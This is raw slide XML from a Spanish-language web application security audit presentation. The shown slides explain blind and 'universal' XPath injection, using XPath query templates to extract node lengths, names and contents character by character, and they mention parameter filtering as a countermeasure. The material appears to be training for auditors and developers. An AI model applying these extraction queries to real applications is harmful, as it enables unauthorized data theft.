              <a:t>[1]/@*[position() = 1 and starts-with(name(), ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>')]</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve cierto si el primer atributo del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> empieza con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" i="1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Información contenida en nodos y atributos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/>
              <a:t>Longitud de nodos y atributos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>string-length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(/nodo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>]/campo) &gt; 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve la longitud del contenido del nodo campo dentro del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> en la posición </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>string-length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(/nodo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>[X]/@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>atrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>) &gt; 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve la longitud del contenido del atributo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>atrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>dentro del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> en la posición </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X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Información contenida en nodos y atributos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/>
              <a:t>Texto de nodos y atributos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>starts-with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(/nodo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>]/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>campo,’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve cierto si el campo del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> empieza por la cadena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>starts-with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(/nodo/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>]/@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>atrib,’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Devuelve cierto si el atributo del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subnodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>empieza por la cadena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Evidentemente también se puede hacer reducción de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> y búsqueda binaria…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Universal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection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Nos permite extraer todo el contenido de los nodos sin conocer nada acerca del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>arbol</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>No se puede hacer lo mismo con atributos, comentarios o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>processing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>instructions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se basa en las consultas:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Longitud: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>string-length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::*) &gt; 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Reduccion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::*)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Extraccion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>starts-with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>::*, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>’)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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2906713"/>
            <a:ext cx="7772400" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Axolote</a:t>
            </a:r>
            <a:endParaRPr lang="es-E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Mediante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> podemos acceder a todo el contenido del fichero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>En campos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> hacer uso de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> es abusar un poco :P</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>De nuevo, filtrar los parámetros se convierte en condición indispensable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>UXI vale para casos en los que la mayor parte de la información esta contenida en los nodos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4/2005 1:25:30 PM&quot;&gt;&lt;Slide id=&quot;383&quot; dur=&quot;1523.75&quot;/&gt;&lt;Slide id=&quot;390&quot; dur=&quot;37&quot; bld=&quot;|1&quot;/&gt;&lt;Slide id=&quot;352&quot; dur=&quot;50.641&quot;/&gt;&lt;Slide id=&quot;378&quot; dur=&quot;156.469&quot; bld=&quot;|29|42.2|25.5&quot;/&gt;&lt;Slide id=&quot;436&quot; dur=&quot;83.765&quot; bld=&quot;|64.5&quot;/&gt;&lt;Slide id=&quot;431&quot; dur=&quot;195.594&quot; bld=&quot;|65|21|25.8|12.5|15.5&quot;/&gt;&lt;Slide id=&quot;435&quot; dur=&quot;97.672&quot; bld=&quot;|14.3|54.5|11.7|4.9|5&quot;/&gt;&lt;Slide id=&quot;438&quot; dur=&quot;140.016&quot;/&gt;&lt;Slide id=&quot;433&quot; dur=&quot;95.859&quot; bld=&quot;|34.1|25.8&quot;/&gt;&lt;Slide id=&quot;440&quot; dur=&quot;202.328&quot; bld=&quot;|15.5|13.3|24.5|60.1|4.7|10.9|11.9|51&quot;/&gt;&lt;Slide id=&quot;369&quot; dur=&quot;64.25&quot; bld=&quot;|34.5&quot;/&gt;&lt;Slide id=&quot;371&quot; dur=&quot;79.406&quot;/&gt;&lt;Slide id=&quot;387&quot; dur=&quot;594.125&quot; bld=&quot;|1&quot;/&gt;&lt;Slide id=&quot;385&quot; dur=&quot;200.422&quot;/&gt;&lt;Slide id=&quot;381&quot; dur=&quot;54.797&quot;/&gt;&lt;Slide id=&quot;386&quot; dur=&quot;69.438&quot;/&gt;&lt;Slide id=&quot;370&quot; dur=&quot;38.046&quot;/&gt;&lt;Slide id=&quot;415&quot; dur=&quot;119.563&quot;/&gt;&lt;Slide id=&quot;388&quot; dur=&quot;420.078&quot; bld=&quot;|1&quot;/&gt;&lt;Slide id=&quot;416&quot; dur=&quot;43.328&quot; bld=&quot;|15.2|9&quot;/&gt;&lt;Slide id=&quot;418&quot; dur=&quot;324.766&quot; bld=&quot;|52.8|23.2|10.2|22.8|43.3|35.2|9|9.6|8.3|12.9|19|22.1&quot;/&gt;&lt;Slide id=&quot;443&quot; dur=&quot;213.515&quot;/&gt;&lt;Slide id=&quot;354&quot; dur=&quot;247.36&quot; bld=&quot;|52.2|105&quot;/&gt;&lt;Slide id=&quot;427&quot; dur=&quot;136.812&quot; bld=&quot;|59.7&quot;/&gt;&lt;Slide id=&quot;389&quot; dur=&quot;427.657&quot; bld=&quot;|.5&quot;/&gt;&lt;Slide id=&quot;428&quot; dur=&quot;33.375&quot;/&gt;&lt;Slide id=&quot;439&quot; dur=&quot;18.937&quot;/&gt;&lt;Slide id=&quot;442&quot; dur=&quot;50.344&quot; bld=&quot;|8.2|7.8|5.9|7.4|4.8|8.6|5.9&quot;/&gt;&lt;Slide id=&quot;444&quot; dur=&quot;2.437&quot;/&gt;&lt;Slide id=&quot;265&quot; dur=&quot;30.625&quot;/&gt;&lt;/Timings&gt;&lt;Timings time=&quot;8/2/2005 12:37:57 PM&quot;&gt;&lt;Slide id=&quot;266&quot; dur=&quot;1403.656&quot;/&gt;&lt;Slide id=&quot;257&quot; dur=&quot;68.703&quot;/&gt;&lt;Slide id=&quot;383&quot; dur=&quot;11.594&quot;/&gt;&lt;Slide id=&quot;376&quot; dur=&quot;16.078&quot;/&gt;&lt;Slide id=&quot;295&quot; dur=&quot;45.672&quot;/&gt;&lt;Slide id=&quot;352&quot; dur=&quot;55.656&quot;/&gt;&lt;Slide id=&quot;378&quot; dur=&quot;162.735&quot; bld=&quot;|1.6|.5|53.5|48.5&quot;/&gt;&lt;Slide id=&quot;359&quot; dur=&quot;254.687&quot; bld=&quot;|1.5|31|37.1|52.1|45.8|52.3&quot;/&gt;&lt;Slide id=&quot;380&quot; dur=&quot;119.953&quot; bld=&quot;|81.7|6.7|3|8.7|2.3|13.2&quot;/&gt;&lt;Slide id=&quot;367&quot; dur=&quot;217.094&quot; bld=&quot;|23|28.3|36|71.6&quot;/&gt;&lt;Slide id=&quot;368&quot; dur=&quot;174.203&quot; bld=&quot;|35.7|8.9|7.5|12|31.8|28.9|12|15.9|7.7&quot;/&gt;&lt;Slide id=&quot;369&quot; dur=&quot;56.875&quot; bld=&quot;|40.1&quot;/&gt;&lt;Slide id=&quot;371&quot; dur=&quot;66.453&quot;/&gt;&lt;Slide id=&quot;341&quot; dur=&quot;381.672&quot; bld=&quot;|1|.5&quot;/&gt;&lt;Slide id=&quot;385&quot; dur=&quot;132.625&quot;/&gt;&lt;Slide id=&quot;381&quot; dur=&quot;75.906&quot;/&gt;&lt;Slide id=&quot;386&quot; dur=&quot;72.032&quot;/&gt;&lt;Slide id=&quot;370&quot; dur=&quot;64.64&quot;/&gt;&lt;Slide id=&quot;365&quot; dur=&quot;60.485&quot; bld=&quot;|28|8.3&quot;/&gt;&lt;Slide id=&quot;332&quot; dur=&quot;81.672&quot;/&gt;&lt;Slide id=&quot;343&quot; dur=&quot;321.203&quot; bld=&quot;|.5|.5&quot;/&gt;&lt;Slide id=&quot;354&quot; dur=&quot;170.765&quot; bld=&quot;|21.3|33.4|67.4&quot;/&gt;&lt;Slide id=&quot;382&quot; dur=&quot;268.797&quot;/&gt;&lt;Slide id=&quot;384&quot; dur=&quot;106.078&quot; bld=&quot;|.1|2|63.4|2&quot;/&gt;&lt;Slide id=&quot;357&quot; dur=&quot;310.125&quot; bld=&quot;|.5|.5&quot;/&gt;&lt;Slide id=&quot;347&quot; dur=&quot;66.375&quot;/&gt;&lt;Slide id=&quot;363&quot; dur=&quot;45.5&quot;/&gt;&lt;Slide id=&quot;379&quot; dur=&quot;31.907&quot;/&gt;&lt;Slide id=&quot;282&quot; dur=&quot;4.625&quot;/&gt;&lt;Slide id=&quot;265&quot; dur=&quot;60.156&quot;/&gt;&lt;/Timings&gt;&lt;Timings time=&quot;8/2/2005 12:35:41 PM&quot;&gt;&lt;Slide id=&quot;266&quot; dur=&quot;65.516&quot;/&gt;&lt;/Timings&gt;&lt;/WMTools&gt;"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="6_Master_Template">
  <a:themeElements>
    <a:clrScheme name="Master_Template 9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618FFD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8571</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Presentación en pantalla (4:3)</PresentationFormat>
  <Paragraphs>1176</Paragraphs>
  <Slides>140</Slides>
  <Notes>96</Notes>
  <HiddenSlides>1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140</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="153" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Garamond</vt:lpstr>
      <vt:lpstr>Segoe</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>6_Master_Template</vt:lpstr>
      <vt:lpstr>Documento</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>Auditoria Aplicaciones Web</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>MITO I: ¿Por qué se van a meter conmigo?</vt:lpstr>
      <vt:lpstr>MITO I: ¿Por qué se van a meter conmigo?</vt:lpstr>
      <vt:lpstr>MITO II: Mi Sistema es el mas seguro</vt:lpstr>
      <vt:lpstr>MITO III: Con SSL y mi Firewall estoy a salvo</vt:lpstr>
      <vt:lpstr>MITO III: Con SSL y mi Firewall estoy a salvo</vt:lpstr>
      <vt:lpstr>WAF (Web Application Firewall)</vt:lpstr>
      <vt:lpstr>WAF (Web Application Firewall)</vt:lpstr>
      <vt:lpstr>WAF (Web Application Firewall)</vt:lpstr>
      <vt:lpstr>MITO IV: Es cosa de la gente de Sistemas</vt:lpstr>
      <vt:lpstr>MITO IV: Es cosa de la gente de Sistemas</vt:lpstr>
      <vt:lpstr>Fundamentos para una Aplicación Web Segura</vt:lpstr>
      <vt:lpstr>Securizar la Red</vt:lpstr>
      <vt:lpstr>Securizar el Servidor</vt:lpstr>
      <vt:lpstr>Securiza tu aplicación</vt:lpstr>
      <vt:lpstr>Ciclo de desarrollo seguro</vt:lpstr>
      <vt:lpstr>Ciclo de desarrollo seguro</vt:lpstr>
      <vt:lpstr>Ciclo de desarrollo seguro</vt:lpstr>
      <vt:lpstr>Modelo de amenaza STRIDE</vt:lpstr>
      <vt:lpstr>Modelo de amenaza STRIDE</vt:lpstr>
      <vt:lpstr>Ciclo de desarrollo seguro</vt:lpstr>
      <vt:lpstr>Ciclo de desarrollo seguro</vt:lpstr>
      <vt:lpstr>Ciclo de desarrollo seguro</vt:lpstr>
      <vt:lpstr>OWASP Top 10 2007 </vt:lpstr>
      <vt:lpstr>OWASP Top 10 2010</vt:lpstr>
      <vt:lpstr>OWASP Top 10 2010</vt:lpstr>
      <vt:lpstr>OWASP Top 10 2010</vt:lpstr>
      <vt:lpstr>¿Qué aplicaciones Web están afectadas?</vt:lpstr>
      <vt:lpstr>Desconfía del cliente</vt:lpstr>
      <vt:lpstr>Desconfía del Cliente</vt:lpstr>
      <vt:lpstr>Desconfía del Cliente</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Definición</vt:lpstr>
      <vt:lpstr>Tipos de XSS</vt:lpstr>
      <vt:lpstr>Tipos de XSS</vt:lpstr>
      <vt:lpstr>Riesgos</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Robo de Sesiones (XSS)</vt:lpstr>
      <vt:lpstr>Robo de Sesiones (XSS)</vt:lpstr>
      <vt:lpstr>Robo de Sesiones (XSS)</vt:lpstr>
      <vt:lpstr>Robo de Sesiones (XSS)</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgey (CSRF)</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>ClickJacking</vt:lpstr>
      <vt:lpstr>Cross Domain Request</vt:lpstr>
      <vt:lpstr>¿Qué hago como desarrollador?</vt:lpstr>
      <vt:lpstr>¿Qué hago como desarrollador?</vt:lpstr>
      <vt:lpstr>¿Qué hago como desarrollador?</vt:lpstr>
      <vt:lpstr>Vulnerabilidades</vt:lpstr>
      <vt:lpstr>Introducción</vt:lpstr>
      <vt:lpstr>SQL Injection. Explotación del ataque</vt:lpstr>
      <vt:lpstr>SQL Injection. Riesgos</vt:lpstr>
      <vt:lpstr>SQL Injection. Básico</vt:lpstr>
      <vt:lpstr>SQL Injection. Básico</vt:lpstr>
      <vt:lpstr>SQL Injection.  Listado de información</vt:lpstr>
      <vt:lpstr>SQL Injection. Listado de Información</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Arithmetic SQL Injection</vt:lpstr>
      <vt:lpstr>Arithmetic SQL Injection</vt:lpstr>
      <vt:lpstr>Arithmetic SQL Injection</vt:lpstr>
      <vt:lpstr>Acceso a ficheros</vt:lpstr>
      <vt:lpstr>SQL Server 2K - External Data Sources</vt:lpstr>
      <vt:lpstr>SQL Server 2K – Bulk option </vt:lpstr>
      <vt:lpstr>SQL Server 2k5 -</vt:lpstr>
      <vt:lpstr>SQL Server 2k5</vt:lpstr>
      <vt:lpstr>MySQL</vt:lpstr>
      <vt:lpstr>Oracle</vt:lpstr>
      <vt:lpstr>Blind SQL Injection. Descarga de Ficheros</vt:lpstr>
      <vt:lpstr>Time-Based Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Time-Based Blind SQL Injection: Tools</vt:lpstr>
      <vt:lpstr>Marathon Tool</vt:lpstr>
      <vt:lpstr>Blind SQL Injection. Base a tiempos</vt:lpstr>
      <vt:lpstr>¿Qué hago como desarrollador?</vt:lpstr>
      <vt:lpstr>¿Qué hago como administrador de Sistemas?</vt:lpstr>
      <vt:lpstr>Introducción</vt:lpstr>
      <vt:lpstr>XPath</vt:lpstr>
      <vt:lpstr>Conceptos en XPath</vt:lpstr>
      <vt:lpstr>Conceptos en XPath</vt:lpstr>
      <vt:lpstr>Operadores</vt:lpstr>
      <vt:lpstr>XPath Injection</vt:lpstr>
      <vt:lpstr>XPath Injection</vt:lpstr>
      <vt:lpstr>Xpath Injection</vt:lpstr>
      <vt:lpstr>Blind XPath Injection</vt:lpstr>
      <vt:lpstr>Consultas “avanzadas” en XPath </vt:lpstr>
      <vt:lpstr>Funciones disponibles en XPath</vt:lpstr>
      <vt:lpstr>Numero total de nodos y atributos</vt:lpstr>
      <vt:lpstr>Longitud de nodos y atributos</vt:lpstr>
      <vt:lpstr>Reduccion de charset</vt:lpstr>
      <vt:lpstr>Búsqueda binaria</vt:lpstr>
      <vt:lpstr>Nombre de nodos y atributos</vt:lpstr>
      <vt:lpstr>Información contenida en nodos y atributos</vt:lpstr>
      <vt:lpstr>Información contenida en nodos y atributos</vt:lpstr>
      <vt:lpstr>Universal XPath Injection</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Conclusiones</vt:lpstr>
      <vt:lpstr>Introducción</vt:lpstr>
      <vt:lpstr>¿Qué es un directorio?</vt:lpstr>
      <vt:lpstr>¿Qué es un servicio de Directorio?</vt:lpstr>
      <vt:lpstr>Problemática de los directorios</vt:lpstr>
      <vt:lpstr>Estándares de directorio  X.500</vt:lpstr>
      <vt:lpstr>¿Qué es LDAP?</vt:lpstr>
      <vt:lpstr>¿Qué problemas resuelve?</vt:lpstr>
      <vt:lpstr>Funcionamiento</vt:lpstr>
      <vt:lpstr>Expansión de LDAP</vt:lpstr>
      <vt:lpstr>ADAM</vt:lpstr>
      <vt:lpstr>OpenLDAP</vt:lpstr>
      <vt:lpstr>Conexiones LDAP</vt:lpstr>
      <vt:lpstr>CAIN &amp; LDAP</vt:lpstr>
      <vt:lpstr>Singelsainon</vt:lpstr>
      <vt:lpstr>RFC: 4515</vt:lpstr>
      <vt:lpstr>AND LDAP Injection</vt:lpstr>
      <vt:lpstr>OR LDAP Injection</vt:lpstr>
      <vt:lpstr>Blind LDAP injecttion</vt:lpstr>
      <vt:lpstr>Booleanización de datos</vt:lpstr>
      <vt:lpstr>Excepciones</vt:lpstr>
      <vt:lpstr>Blind LDAP Injection</vt:lpstr>
      <vt:lpstr>Contramedidas</vt:lpstr>
      <vt:lpstr>Vulnerabilidades</vt:lpstr>
      <vt:lpstr>Remote File Disclosure (RFD)</vt:lpstr>
      <vt:lpstr>Local and Remote File Inclusion (LFI &amp; RFI)</vt:lpstr>
      <vt:lpstr>Local and Remote File Inclusion (LFI &amp; RFI)</vt:lpstr>
      <vt:lpstr>Local and Remote File Inclusion (LFI &amp; RFI)</vt:lpstr>
      <vt:lpstr>Local and Remote File Inclusion (LFI &amp; RFI)</vt:lpstr>
      <vt:lpstr>Local and Remote File Inclusion (LFI &amp; RFI)</vt:lpstr>
      <vt:lpstr>Local and Remote File Inclusion (LFI &amp; RFI)</vt:lpstr>
      <vt:lpstr>Troyanos Web. Explotación del Ataque</vt:lpstr>
      <vt:lpstr>Troyanos Web. Riesgos</vt:lpstr>
      <vt:lpstr>Troyanos Web. Forma de ataque</vt:lpstr>
      <vt:lpstr>Troyano Web</vt:lpstr>
      <vt:lpstr>Vulnerabilidades</vt:lpstr>
